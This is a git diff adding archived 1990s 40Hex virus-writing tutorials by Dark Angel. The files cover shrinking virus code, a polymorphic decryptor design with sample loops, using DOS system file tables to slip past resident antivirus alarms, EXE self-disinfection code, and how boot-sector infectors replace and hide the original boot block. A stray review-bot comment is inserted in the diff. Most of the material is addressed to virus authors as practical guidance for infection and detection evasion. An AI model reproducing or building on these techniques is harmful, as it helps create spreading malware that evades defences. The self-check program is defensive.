bytes + xor bp,bp ; mov reg, 0 always takes 2 bytes + or even + sub ax,ax ; also takes 2 bytes + sub bp,bp + + One of the easiest optimisations, yet often overlooked by novices, is the + merging of lines. As an example, replace: + mov bh,5h ; two bytes + mov bl,32h ; two bytes + ; total: four bytes + with + mov bx,532h ; three bytes, save one byte + + A very useful optimisation moving the file handle from ax to bx follows. 
+ Replace: + mov bx,ax ; 2 bytes + with + xchg ax,bx ; 1 byte + + Another easy optimisation which can most easily applied to file pointer + moving operations: + Replace + mov ax,4202h ; save one byte from "mov ah,42h / mov al,2" + xor dx,dx ; saves one byte from "mov dx,0" + xor cx,cx ; same here + int 21h + with + mov ax,4202h + cwd ; equivalent to "xor dx,dx" when ax < 8000h + xor cx,cx + int 21h + + Sometimes it may be desirable to use si as the delta offset variable, as an + instruction involving [si] takes one less byte to encode than its + equivalent using [bp]. This does NOT work with combinations such as + [si+1]. Examples: + + mov ax,[bp] ; 3 bytes + mov word ptr cs:[bp],1234h ; 6 bytes + add ax,[bp+1] ; 3 bytes - no byte savings will occur + + mov ax,[si] ; 2 bytes + mov word ptr cs:[si],1234h ; 5 bytes + add ax,[si+1] ; 3 bytes - this is not smaller + + A somewhat strange and rather specialised optimisation: + inc al ; 2 bytes + inc bl ; 2 bytes + versus + inc ax ; 1 byte + inc bx ; 1 byte + + A structural optimisation can also involve getting rid of redundant code. + As a virus related example, consider the infection routine. In few + instances is an error-trapping routine after each interrupt call necessary. + A single "jc error" is needed, say after the first disk-writing interrupt, + and if that succeeds, the rest should also work fine. Another possibility + is to use a critical error handler instead of error checking. + + How about this example of optimised code: + mov ax, 4300h ; get file attributes + mov dx, offset filename + int 21h + + push dx ; save filename + push cx ; and attributes on stack + + inc ax ; ax = 4301h = set file attributes + push ax ; save 4301h on stack + xor cx,cx ; clear attributes + int 21h + + ...rest of infection... + + pop ax ; ax = 4301h + pop cx ; cx = original attributes of file + pop dx ; dx-> original filename + int 21h + + Optimisation is almost always code-specific. 
Through a combination of + restructuring and line replacement, a good programmer can drastically + reduce the size of a virus. By gaining a good feel of the 80x86 + instruction set, many more optimisations may be found. Above all, good + program design will aid in creating small viruses. diff --git a/textfiles.com/virus/datut006.txt b/textfiles.com/virus/datut006.txt new file mode 100644 index 00000000..815c0566 --- /dev/null +++ b/textfiles.com/virus/datut006.txt 
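Review bot: the comment on "xor bp,bp" reads "mov reg, 0 always takes 2 bytes", which contradicts the line above it (mov reg,0 is 3 bytes) and should read "xor reg,reg always takes 2 bytes". The sentence introducing the file-pointer example is missing a word: "which can most easily applied" should be "which can most easily be applied". The "optimised code" attribute example also depends on AX still holding 4300h after the first int 21h returns so that "inc ax" yields 4301h; the text should state that this is an assumption about what the call preserves rather than a documented guarantee.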
@@ -0,0 +1,188 @@ + + + ADVANCED POLYMORPHISM + PRIMER + PART THE FIRST + + By Dark Angel + Phalcon/Skism + + + With the recent proliferation of virus encryption "engines," I was + inspired to write my own. In a few short weeks, I was able to construct one + such routine which can hold its own. A polymorphic encryption routine is + nothing more than a complex code generator. Writing such a routine, while + not incredibly difficult, requires careful planning and perhaps more than a + few false starts. + + The utility of true polymorphism is, by now, an accepted fact. + Scanning for the majority of viruses is a trivial task, involving merely the + identification of a specific pattern of bytes in executable files. This + approach is quick and may be used to detect nearly all known viruses. + However, polymorphism throws a monkey wrench into the works. Polymorphic + viruses encode each copy of the virus with a different decryption routine. + Since (theoretically) no bytes remain constant in each generated decryption + routine, virus detectors cannot rely on a simple pattern match to locate + these viruses. Instead, they are forced to use an algorithmic appproach + susceptible to "false positives," misleading reports of the existence of the + virus where it is not truly present. Creating a reliable algorithm to + detect the polymorphic routine takes far more effort than isolating a usable + scan string. Additionally, if a virus detector fails to find even one + instance of the virus, then that single instance will remain undetected and + spawn many more generations of the virus. Survival, of course, is the + ultimate goal of the virus. + + Before attempting to write a polymorphic routine, it is necessary to + obtain a manual detailing the 80x86 instruction set. Without bit-level + manipulation of the opcodes, any polymorphic routine will be of limited + scope. 
The nice rigid structure of the 80x86 instruction set will be + readily apparent after a simple perusal of the opcodes. Exploitation of + this structured instruction set allows for the compact code generation + routines which lie at the heart of every significant polymorphic routine. + + After examining the structure of the opcodes, the basic organisation of + the polymorphic routine should be laid out. Here, an understanding of the + basics behind such routines is required. The traditional approach treats + the decryption routine as a simple executable string, such as + "BB1301B900022E8137123483C302E2F6." A true (advanced) polymorphic routine, + by contrast, views the decryption routine as a conceptual algorithm, such + as, "Set up a 'pointer' register, that is, the register whose contents hold + a pointer to the memory to be decrypted. Set up a counter register. Use + the pointer register to decrypt one byte. Update the pointer register. + Decrement the count register, looping if it is not zero." Two routines + which fit this algorithm follow: + + Sample Encryption 1 + ------ ---------- - + mov bx,offset startencrypt ; here, bx is the 'pointer' register + mov cx,viruslength / 2 ; and cx holds the # of iterations + decrypt_loop: + xor word ptr [bx],12h ; decrypt one word at a time + inc bx ; update the pointer register to + inc bx ; point to the next word + loop decrypt_loop ; and continue the decryption + startencrypt: + + Sample Encryption 2 + ------ ---------- - + start: + mov bx,viruslength ; now bx holds the decryption length + mov bp,offset start ; bp is the 'pointer' register + decrypt_loop: + add byte ptr [bp+0Ch],33h ; bp+0Ch -> memory location to be + ; decrypted at each iteration + inc bp ; update the pointer register + dec bx ; and the count register + jnz decrypt_loop ; loop if still more to decrypt + + The number of possibilities is essentially infinite. 
Naturally, + treating the decryption as an algorithm rather than as an executable string + greatly increases the flexibility in creating the actual routine. Various + portions of the decryption algorithm may be tinkered with, allowing for + further variations. Using the example above, one possible variation is to + swap the order of the setup of the registers, i.e. + + mov cx,viruslength + mov bx,offset startencrypt + + in lieu of + + mov bx,offset startencrypt + mov cx,viruslength + + It is up to the individual to decide upon the specific variations which + should be included in the polymorphic routine. Depending upon the nature of + the variations and the structure of the polymorphic routine, each increase + in power may be accompanied with only a minimal sacrifice in code length. + The goal is for the routine to be capable of generating the greatest number + of variations in the least amount of code. It is therefore desirable to + write the polymorphic routine in a manner such that additional variations + may be easily accommodated. Modularity is helpful in this respect, as the + modest overhead is rapidly offset by substantial space savings. + + The first step most polymorphic routines undergo is the determination + of the precise variation which is to be encoded. For example, a polymorphic + routine may decide that the decryption routine is to use word-length xor + encryption with bx as the pointer register, dx as a container for the + encryption value, and cx as the counter register. Once this information is + known, the routine should be able to calculate the initial value of each + variable. For example, if cx is the counter register for a byte-length + encryption, then it should hold the virus length. To increase variability, + the length of the encryption can be increased by a small, random amount. + Note that some variables, in particular the pointer register, may not be + known before encoding the rest of the routine. This detail is discussed + below. 
+ + Of course, selecting the variables and registers will not in and of + itself yield a valid decryption routine; the polymorphic routine must also + encode the actual instructions to perform the job! The cheesiest + polymorphic routines encode a single "mov" instruction for the assignment of + a value to a register. The more complex routines encode a series of + instructions which are functionally equivalent to the simple three byte + "mov" statement yet far different in form. For example, + + mov ax, 808h + + could be replaced with + + mov ax, 303h ; ax = 303h + mov bx, 101h ; bx = 101h + add ax, bx ; ax = 404h + shl ax, 1 ; ax = 808h + + Recall that the registers should be encoded in a random order. The + counter variable, for example, should not always be the first to be encoded. + Predictability, the bane of polymorphic routines, must be avoided at all + costs. + + After the registers are encoded, the actual decryption loop should then + be encoded. The loop can perform a number of actions, the most significant + of which should be to manipulate the memory location, i.e. the actual + decryption instruction, and to update the pointer register, if necessary. + Finally, the loop instruction itself should be encoded. This can take many + forms, including "loop," "loopnz," "jnz," etc. Possible variations include + altering the decryption value register and the counter register during each + iteration. + + This is the general pattern of encoding. By placing garbling, or "do- + nothing," instructions between the essential pieces of code, further + variability may be ensured. These instructions may take many forms. If the + encoding routines are well-designed, the garbler can take advantage of the + pre-existing code to generate null instructions, such as assignments to + unused registers. + + Once the decryption routine has been written, it is necessary to + encrypt the virus code. 
The traditional approach gives the polymorphic + routine the job of encrypting the code. The polymorphic routine should + therefore "remember" how the precise variation used by the decryptor and + adjust the encryption routine in a complementary fashion. An alternate + approach is for the polymorphic routine to simultaneously encode both the + encryption and decryption routines. Although it adds overhead to the code, + it is an extremely flexible approach that easily accommodates variations + which may be later introduced into the polymorphic routine. + + Variable-length decryptors come at a significant trade-off; the exact + start of the decryption cannot be known before encoding the decryptor. + There are two approaches to working around this limitation. The first is to + encode the pointer register in a single instruction, i.e. mov bx,185h and to + patch the initial value once it is known. This is simplistic, though + undesirable, as it decreases the variability of the routine. An alternate + approach is to encode the encryption instruction in the form xor word ptr + [bx+185h], cx (as in Sample Encryption 2, above) instead of xor word ptr + [bx], cx (as in Sample Encryption 1). This increases the flexibility of the + routine, as the initial value of the pointer register need not be any fixed + value; correct decryption may be assured by adjusting the offset in the + decryption instruction. It is then possible to encode the pointer register + with multiple instructions, increasing flexibility. However, using either + method alone increases the predictability of the generated code. A better + approach would be to incorporate both methods into a single polymorphic + routine and randomly selecting one during each run. + + As an example of a polymorphic routine, I present DAME, Dark Angel's + Multiple Encryptor and a simple virus which utilises it. They appear in the + following article. DAME uses a variety of powerful techniques to achieve + full polymorphism. 
Additionally, it is easy to enhance; both the encoding + routines and the garblers can be extended algorithmically with minimal + effort. In the next issue, I will thoroughly comment and explain the + various parts of DAME. + diff --git a/textfiles.com/virus/datut007.txt b/textfiles.com/virus/datut007.txt new file mode 100644 index 00000000..bfbb107f --- /dev/null +++ b/textfiles.com/virus/datut007.txt 
@@ -0,0 +1,156 @@ + + + SFT's and Their Usage + + By Dark Angel + Phalcon/Skism + + + A powerful though seldom-used technique in virus writing is the use of + the system file table, an internal DOS structure similar in some respects to + FCBs, albeit vastly more powerful. The system file table holds the critical + information on the state of an open file, including the current pointer + location, the open mode, and the file size. Manipulation of the system file + tables can often replace calls to corresponding DOS interrupt routines and + therefore, when combined with other techniques, reduces the effectiveness of + a TSR virus monitor and decreases code size. + + Each open file has a corresponding system file table. The following + tables come from Ralf Brown's interrupt listing. + + Format of DOS 2.x system file tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 28h bytes per file + Offset Size Description + 00h BYTE number of file handles referring to this file + 01h BYTE file open mode (see AH=3Dh) + 02h BYTE file attribute + 03h BYTE drive (0 = character device, 1 = A, 2 = B, etc) + 04h 11 BYTEs filename in FCB format (no path, no period, + blank-padded) + 0Fh WORD ??? + 11h WORD ??? + 13h DWORD file size??? + 17h WORD file date in packed format (see AX=5700h) + 19h WORD file time in packed format (see AX=5700h) + 1Bh BYTE device attribute (see AX=4400h) + ---character device--- + 1Ch DWORD pointer to device driver + ---block device--- + 1Ch WORD starting cluster of file + 1Eh WORD relative cluster in file of last cluster accessed + ------ + 20h WORD absolute cluster number of current cluster + 22h WORD ??? + 24h DWORD current file position??? 
+ + Format of DOS 3.x system file tables and FCB tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 35h bytes per file + Offset Size Description + 00h WORD number of file handles referring to this file + 02h WORD file open mode (see AH=3Dh) + bit 15 set if this file opened via FCB + 04h BYTE file attribute + 05h WORD device info word (see AX=4400h) + 07h DWORD pointer to device driver header if character device + else pointer to DOS Drive Parameter Block (see AH=32h) + 0Bh WORD starting cluster of file + 0Dh WORD file time in packed format (see AX=5700h) + 0Fh WORD file date in packed format (see AX=5700h) + 11h DWORD file size + 15h DWORD current offset in file + 19h WORD relative cluster within file of last cluster accessed + 1Bh WORD absolute cluster number of last cluster accessed + 0000h if file never read or written??? + 1Dh WORD number of sector containing directory entry + 1Fh BYTE number of dir entry within sector (byte offset/32) + 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) + 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file + 2Fh WORD (SHARE.EXE) network machine number which opened file + 31h WORD PSP segment of file's owner (see AH=26h) + 33h WORD offset within SHARE.EXE code segment of + sharing record (see below) 0000h = none + + Format of DOS 4+ system file tables and FCB tables: + Offset Size Description + 00h DWORD pointer to next file table + 04h WORD number of files in this table + 06h 3Bh bytes per file + Offset Size Description + 00h WORD number of file handles referring to this file + 02h WORD file open mode (see AH=3Dh) + bit 15 set if this file opened via FCB + 04h BYTE file attribute + 05h WORD device info word (see AX=4400h) + bit 15 set if remote file + bit 14 set means do not set file date/time on closing + 07h DWORD pointer to device driver header if character device + else pointer to DOS Drive Parameter Block (see AH=32h) + or 
REDIR data + 0Bh WORD starting cluster of file + 0Dh WORD file time in packed format (see AX=5700h) + 0Fh WORD file date in packed format (see AX=5700h) + 11h DWORD file size + 15h DWORD current offset in file + ---local file--- + 19h WORD relative cluster within file of last cluster accessed + 1Bh DWORD number of sector containing directory entry + 1Fh BYTE number of dir entry within sector (byte offset/32) + ---network redirector--- + 19h DWORD pointer to REDIRIFS record + 1Dh 3 BYTEs ??? + ------ + 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) + 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file + 2Fh WORD (SHARE.EXE) network machine number which opened file + 31h WORD PSP segment of file's owner (see AH=26h) + 33h WORD offset within SHARE.EXE code segment of + sharing record (see below) 0000h = none + 35h WORD (local) absolute cluster number of last clustr + accessed (redirector) ??? + 37h DWORD pointer to IFS driver for file, 0000000h if native DOS + + In order to exploit this nifty structure in DOS, the virus must first + find the location of the appropriate system file table. This may be easily + accomplished with a few undocumented DOS calls. Given the file handle in + bx, the following code will return the address of the corresponding system + file table: + + mov ax,1220h ; Get job file table entry to ES:DI + int 2fh ; DOS 3+ only + + mov bl,es:di ; get number of the SFT for the file handle + ; -1 = handle not open + mov ax,1216h ; get address of the system file table + int 2fh ; entry number bx + ; ES:DI now points to the system file table entry + + Now that the system file table entry address is known, it is a trivial + matter to alter the various bytes of the entry to fit your particular needs. + Most viruses must first clear a file's attributes in order to open the file + in read/write mode, since it would otherwise not be able to write to a read- + only file. 
This handicap is easily overcome by opening the file in read- + only mode (al = 0) and changing the byte (or word) referring to the file's + open mode to 2. This has the added benefit of bypassing some resident + alarms, which generally do not go off if a file is opened in read only mode. + It is also possible to set a file's pointer by altering the double word at + offset 15h (in DOS 3+). So a quick and easy way to reset the file pointer + is: + mov es:di+15h,0 + mov es:di+17h,0 + + It is acceptable to ignore the DOS 2.X system file table format. DOS + 2.X is not in common use today and many programs simply refuse to run under + such primitive versions. Most of the useful offsets are constant in DOS + 3.X+, which simplifies the code tremendously. + + This is only a surface treatment of a topic which warrants further + investigation. Numerous opportunities exist for the enterprising virus + author to exploit the power of the system file tables. But the only way to + find these opportunities is to experiment. Have fun! + diff --git a/textfiles.com/virus/datut008.txt b/textfiles.com/virus/datut008.txt new file mode 100644 index 00000000..73dd85f4 --- /dev/null +++ b/textfiles.com/virus/datut008.txt 
@@ -0,0 +1,486 @@ + + + EXE Self-Disinfection + + By Dark Angel + Phalcon/Skism + + +In the last issue of 40Hex, Demogorgon presented an article on self- +disinfecting COM files. COM file disinfection is simplistic and very +straightforward. In this article, we shall deal with the somewhat more +complex topic of EXE file self-disinfection. + +You should already be familiar with the EXE file header and how each of the +fields work. A brief summary follows (a fuller treatment may be found in +40Hex-8.007): + +Offset Description + 00 'MZ' or 'ZM' EXE signature word + 02 Bytes in last page of the image + 04 Number of pages in the file + 06 Number of relocation items + 08 Size of the header in paragraphs + 0A Minimum memory required in paragraphs + 0C Maximum memory requested in paragraphs + 0E Initial SS, offset from header in paragraphs + 10 Initial SP + 12 Negative checksum (ignored) + 14 Initial IP + 16 Initial CS, offset from header in paragraphs + 18 Offset of relocation table from start of file + 1A Overlay number (ignored) + +There are several methods which allow a virus to infect an EXE file. The +most common method involves the virus twiddling with the entry point of the +program to point to the virus. Another involves the virus altering the code +at the original entry point to jmp to its own code. A further method +involves the virus simply overwriting the code at the entry point and +storing the original code somewhere else, possibly at the end of the file. +A final method involves altering the structure of the EXE file so it is +instead recognised as a COM file. The ideal self-check routine should be +able to handle all these cases. + +Part 1 - Detection +~~~~~~~~~~~~~~~~~~ +The strategy for detection is simple; one simply needs to store a copy of +the original header and the first few bytes located at the entry code. When +the program executes, simply check these bytes to those found in the copy +of the program located on the disk. 
If they differ, then there is clearly +something amiss. This is essentially the same as the process for COM self- +checking, but an extra layer of complexity is added since the header is not +loaded into memory at startup. This minor difficulty may be readily +overcome by simply physically storing the header at some point in the +program. + +Since the header is not known before assembling the file, it is necessary +to patch the header into the file after assembly. This may be done rather +easily with a simple utility called 40patch. It will insert the header and +the first 20h (32d) bytes at the entry point of an EXE file at the first +occurence of the string 'Dark Angel eats goat cheese.' in the program. This +string is exactly the length of the header, so be sure to allocate an +additional 20h bytes after the string for the entry point code. + +A sample self-checking program follows: + +----EXE Self-Check Program 1 begin---- + .model small + .radix 16 + .code +; Self-Checking EXE 1 +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm +; tlink +entry_point: mov ah,51 ; Get current PSP to BX + int 21 + mov ds,bx + + mov bx,ds:2c ; Search the environment for + mov es,bx ; our own filename. Note that + mov di,1 ; this only works in DOS 3+. + xor ax,ax + dec di ; It also won't work if the + scasw ; environment has been + jnz $ - 2 ; released. 
+ + xchg dx,di + inc dx + inc dx + push es ; filename to ds:dx + pop ds + mov ax,3d02 ; unless this handler is + int 21 ; tunneled, a virus may + xchg ax,bx ; infect it + mov ax,_DATA + mov ds,ax ; restore DS and ES + mov es,ax + jc error + + mov cx,1c ; check the header for + mov si,offset header ; corruption + call read_buffer + jc close_error + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] ; add this to the entry point + adc cx,0 ; offset from header + int 21 + jc close_error + + mov cx,20 ; now check the first 32 bytes + mov si,offset first20 ; for corruption + call read_buffer + jc close_error + +close_error: pushf + mov ah,3e ; close the file + int 21 + popf + jc error + + mov dx,offset good ; In an actual program, replace + ; this line with a JMP to the + jmp short $+5 ; program entry point +error: mov dx,offset bad + mov ah,9 + int 21 + + mov ax,4c00 + int 21 + +read_buffer: mov ah,3f + mov dx,offset readbuffer + int 21 + jc error_read + clc + cmp ax,cx + jnz error_read + + xchg dx,di + rep cmpsb + clc + jz $+3 +error_read: stc + ret + + .data +good db 'Self-check passed with flying colours.',0Dh,0A,'$' +bad db 'Self-check failed. Program may be infected!' + db 0Dh,0A,'$' + ;0123456789ABCDEF0123456789AB +header db 'Dark Angel eats goat cheese.' +first20 db 20 dup (0) +readbuffer db 20 dup (?) + + .stack + db 100 dup (?) + end entry_point +----EXE Self-Check Program 1 end---- + +----40patch begin---- + .model tiny + .code + .radix 16 + org 100 +; 40patch +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm /m 40patch +; tlink /t 40patch + +; Syntax: +; 40patch filename.exe + +; 40patch will take the executable and patch in the +; header and the first 32d bytes at the entry point in the first +; occurence of the string 'Dark Angel eats goat cheese.' in the +; executable. 
+patch: mov ah,9 + mov dx,offset welcome + int 21 + + mov si,82 +back: lodsb + cmp al,0dh + jnz back + dec si + xchg si,di + mov byte ptr [di],0 + + mov dx,82 + mov ax,3d02 + int 21 + xchg ax,bx + jnc open_okay + + mov si,offset extension + movsw + movsw + movsb + + mov dx,82 + mov ax,3d02 + int 21 + xchg ax,bx + jnc open_okay + + mov dx,offset syntax +error: mov ah,9 + int 21 + + mov ax,4c01 + int 21 + +open_okay: mov ah,3f + mov cx,1c + mov dx,offset header + int 21 + + mov ah,3f + mov cx,20 + mov dx,offset scratchbuffer + int 21 +find_signature: xor ax,ax + mov di,offset scratchbuffer + 20 + mov cx,(100 - 20) / 2 + rep stosw + + mov ah,3f + mov cx,100 - 20 + mov dx,offset scratchbuffer + 20 + int 21 + or ax,ax + jz signature_not_found + add ax,offset scratchbuffer - signature_length + 20 + xchg bp,ax + mov ax,'aD' + mov di,offset scratchbuffer +try_again: scasw + jz signature_check + dec di + cmp di,bp + ja try_next_bytes + jmp short try_again +signature_check:mov si,offset signature + 2 + mov cx,signature_length - 2 + rep cmpsb + jz signature_found + jmp short try_again +try_next_bytes: mov si,offset scratchbuffer + 100 - 20 + mov di,offset scratchbuffer + mov cx,10 + rep movsw + jmp short find_signature + +signature_not_found: + mov dx,offset no_signature + jmp short error + +signature_found:sub di,bp + sub di,1c * 2 + xchg dx,di + or cx,-1 + mov ax,4201 + int 21 + + mov ah,40 + mov dx,offset header + mov cx,1c + int 21 + + mov ax,4201 + xor cx,cx + cwd + int 21 + push dx ax + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] + adc cx,0 + int 21 + + mov ah,3f + mov dx,offset first20 + mov cx,20 + int 21 + + pop dx cx + mov ax,4200 + int 21 + + mov ah,40 + mov dx,offset first20 + mov cx,20 + int 21 + + mov ah,3e + int 21 + + mov ah,9 + mov dx,offset graceful_exit + int 21 + + mov ax,4c00 + int 21 + +welcome db '40patch',0Dh,0A,'$' 
+graceful_exit db 'Completed!',0Dh,0A,'$' +syntax db 'Syntax:',0Dh,0A,' 40patch filename.exe',0Dh,0A,'$' +no_signature db 'Error: Signature not found.',0Dh,0A,'$' +extension db '.EXE',0 +signature db 'Dark Angel eats goat cheese.' +signature_length = $ - signature +header db 1c dup (?) +first20 db 20 dup (?) + +scratchbuffer db 100 dup (?) + + end patch +----40patch end---- + +To test out the programs above, first assemble them both. Next, run 40patch +on the EXE file. If the EXE file is -subsequently- altered in any way, then +it will alert the user of the problem. Note that this will do nothing for a +program that is infected prior to 40patching, so be sure to run it on a +clean system. + +This simple self-checking mechanism won't catch spawning viruses. However, +it is trivial to add such a check. + +Part 2 - Disinfection +~~~~~~~~~~~~~~~~~~~~~ +Usual methods (for there are many oddball variants) of infecting an EXE +file involve appending the virus code to the end of the executable. With +this knowledge in hand, it is sometimes possible to reconstruct an infected +EXE file without too much difficulty. A simple modification of the previous +program will suffice: + +----EXE Self-Check Program 2 begin---- + .model small + .radix 16 + .code +; Self-Checking EXE 2 +; Written by Dark Angel of Phalcon/Skism +; For 40Hex #13 + +; To assemble: (tested with TASM 2.0) +; tasm +; tlink +entry_point: mov ah,51 ; Get current PSP to BX + int 21 + mov ds,bx + + mov bx,ds:2c ; Search the environment for + mov es,bx ; our own filename. Note that + mov di,1 ; this only works in DOS 3+. + xor ax,ax + dec di ; It also won't work if the + scasw ; environment has been + jnz $ - 2 ; released. 
+ + xchg dx,di + inc dx + inc dx + push es ; filename to ds:dx + pop ds + mov ax,3d02 ; unless this handler is + int 21 ; tunneled, a virus may + xchg ax,bx ; infect it + mov ax,_DATA + mov ds,ax ; restore DS and ES + mov es,ax + mov errorcount,0 + + mov cx,1c ; check the header for + mov si,offset header ; corruption + call read_buffer + + mov ax,4200 ; go to the entry point + xor cx,cx + mov dx,word ptr [header+8] + add dx,word ptr [header+16] + rept 4 + shl dx,1 + adc cx,0 + endm + add dx,word ptr [header+14] ; add this to the entry point + adc cx,0 ; offset from header + int 21 + + mov cx,20 ; now check the first 32 bytes + mov si,offset first20 ; for corruption + call read_buffer + + mov ah,3e ; close the file + int 21 + + mov dx,offset good + cmp errorcount,0 + jz $+5 + mov dx,offset errors + + mov ah,9 + int 21 + + mov ax,4c00 + int 21 + +read_buffer: mov ah,3f + mov dx,offset readbuffer + int 21 + jc error_read + clc + cmp ax,cx + jnz error_read + + xchg dx,di + mov bp,si + rep cmpsb + jz read_buffer_ok + + push ax + xchg ax,dx + neg dx + or cx,-1 + mov ax,4201 + int 21 + + mov ah,40 + xchg bp,dx + pop cx + int 21 + + mov dx,offset bad + inc errorcount + jmp short $+5 +error_read: mov dx,offset read_error + mov ah,9 + int 21 + +read_buffer_ok: ret + + .data +good db 'Self-check passed.',0Dh,0A,'$' +errors db 'Errors were detected.',0Dh,0A,'$' +bad db 'Self-check failed. Fixing (may not work).' + db 0Dh,0A,'$' +read_error db 'Error reading file.',0Dh,0A,'$' + ;0123456789ABCDEF0123456789AB +header db 'Dark Angel eats goat cheese.' +first20 db 20 dup (0) +readbuffer db 20 dup (?) +errorcount db ? + + .stack + db 100 dup (?) + end entry_point +----EXE Self-Check Program 2 end---- + +Summary +~~~~~~~ +In general, it is poor practise to rely upon self-disinfection. The ancient +(!) adage 'restore from backups' is best followed upon the discovery of an +infection. 
However, it is helpful for programs to have a degree of self- +awareness in order to alert the user of a virus's presence before it has a +chance to spread too far. Disinfection will allow the user to continue +using some programs (under certain circumstances) without fear of further +spreading the virus. diff --git a/textfiles.com/virus/datut009.txt b/textfiles.com/virus/datut009.txt new file mode 100644 index 00000000..7c09989d --- /dev/null +++ b/textfiles.com/virus/datut009.txt 
@@ -0,0 +1,180 @@ + + + Boot Infectors + + By Dark Angel + Phalcon/Skism + + + As most of our readers have no doubt noticed, 40Hex articles have +traditionally covered file based viruses. It is time to fill in the hole and +cover the other large class of viruses, the partition table and boot sector +viruses, herein termed "boot infectors" for brevity. + File based viruses are executed after the operating system loads. Boot +infectors, however, latch onto the parts of the drive that are accessed by the +BIOS when it attempts to load the operating system itself. Therefore, there is +little that can be done to intercept the boot infector once it has +successfully installed itself onto a disk. + A brief explanation of the basics of disk terminology is in order. Each +disk is divided into 512 byte chunks called sectors. Due to an unfortunate +choice in terminology, however, the system BIOS uses the term "sectors" +differently. For our purposes, we will divide the disk into 512 byte blocks, +with block 0 residing on the beginning of the disk. + The system BIOS assigns three values to each block on the disk. The +values are known as sectors, cylinders (sometimes known as tracks), and heads +(sometimes called sides) and can be represented as a triple +(sector,cylinder,head). Each disk has a certain number of sectors (SEC), +cylinders (CYL), and heads (HDS). Cylinders are numbered from 0 to CYL - 1. +Heads are numbered from 0 to HDS - 1. Sectors, for some unfathomable reason, +are numbered from 1 to SEC. Block 0 corresponds to the triple (1,0,0) (sector +1, cylinder 0, head 0). Block 1 corresponds to (2,0,0), Block 2 with (3,0,0), +and so on, until Block SPH. Block SPH corresponds to (1,1,0), Block SPH+1 with +(2,1,0), and so on. Block 2*SPH is (1,2,0), Block 2*SPH+1 is (2,2,0), etc. +This continues until Block HPC*SPH, which is (0,0,1). + An introduction to the boot process is vital to understanding boot +infectors. 
When the system is reset, the BIOS checks the first block, triple +(1,0,0), of the first hard drive of the system (if any are installed, of +course) to absolute memory address 7C000. If the hard drive exists, the block +that was read in is checked for the signature 0AA55 (in reverse word format) +occuring at offset 1FE. This is the marker for a valid partition table. If a +partition table is found, the code residing in this block is executed at +0:7C00. If a valid partition table is not found (or the hard drive doesn't +exist), then the BIOS tries booting from the floppy drive. It again reads the +first block from the first floppy drive to absolute memory address 7C000. If +there is a readable disk in the drive, it will be loaded in and executed. No +check is made for the 0AA55 signature, although many boot sectors have it +there anyway just for consistency. + Technically, the first block of the hard disk is a boot sector just as it +is on floppies. However, it is sometimes given a different name because of the +partition table convention that allows multiple operating systems to reside on +a single drive. We will call it by the somewhat misleading name of partition +table. Another common name is the master boot record, for reasons that will +become clear momentarily. The partition table convention is basically a simple +structure at the end of the first block of the hard drive that defines where +each operating system exists on a given hard drive. The partition table +structure begins at offset 1BE in the block and consists of an array with four +entries. 
The format of each entry is: + +Ofs Size Description + 0 BYTE boot indicator, 0 = non-bootable, 80h = bootable + 1 BYTE head the partition begins on + 2 BYTE sector the partition begins on + 3 BYTE cylinder the partition begins on + 4 BYTE system indicator, indicates what OS resides in the partition + 01 indicates DOS 12-bit FAT + 04 indicates DOS 16-bit FAT + 5 BYTE head the partition ends on + 6 BYTE sector the partition ends on + 7 BYTE cylinder the partition ends on + 8 DWORD total number of blocks preceding the partition +0C DWORD total number of blocks in the partition + + The code in the partition table loads the boot record of the active +partition (as indicated in the first bit of the partition table structure). +The boot record then loads the operating system that resides in its respective +partition. + When BIOS decides to boot from a floppy, it reads in the first block off +the floppy to 7C000. Floppies don't have partition tables, so this block is +the equivalent of the boot record of a partition on a hard disk. + In DOS, the boot record consists of three bytes for a JMP followed by the +following structure, sometimes known as the BIOS parameter block (BPB): + +Offset Size Description + 3 8 bytes OEM name and version (ASCII) + 0B Word bytes per sector + 0D Byte sectors per cluster + 0E Word reserved sectors (starting at logical sector 0) + 10 Byte number of FATs + 11 Word number of root directory entries (32 bytes each) + 13 Word total sectors in partition + 15 Byte media descriptor + 17 Word sectors per FAT + 19 Word sectors per track + 1B Word number of heads + 1D Word number of hidden sectors + + The rest of the boot record consists of code that loads and executes the +DOS system files, which then take over. There are a number of terms in the +above structure which may be unfamiliar, but don't fret; they will be +explained in due course. + First, however, it is important to note that nothing requires these +structures to exist! 
The partition table, for example, is merely a de facto +convention which was set up to allow operating systems to co-exist on a single +hard drive. The boot record structure defined above is used by DOS for DOS +programs. Of course, another operating system could interpret the structure, +but there is no requirement for a given operating system to use that format. +When infecting disks, however, keep in mind that certain programs require the +structures to be in place. DOS, for example, won't recognise partitions +properly without the partition table being at its usual location. Floppies +also won't work properly if the boot record is not loaded when DOS requests a +read to the first block. In other words, make sure that all requests to the +partition table or boot record return the partition table and boot record in +the appropriate locations. The other code may be changed with the only +drawback in such a scheme being easy detection of the code modifications. A +better approach is to redirect requests to the modified blocks to a stored +copy of the original. In other words, stealth. + Seeing these structures, the method of infection, conceptually, at the +very least, should be apparent. It's a simple matter to replace the code of +the partition table or boot record with your own. All your code has to do is +store the block somewhere else on the disk and replace the block with itself. +When the virus gains control, it needs to put itself in memory and then load +the original block into memory at 7C000 and then transfer control to this +code. Once it is in memory, it is free to infect any disks which come into +contact with the computer. + This is all nice and easy to say, but there are a few details which would +be helpful to know before plunging into writing a boot infector. When control +is transferred to either the partition table or boot record, CS:IP is set to +0:7C00. 
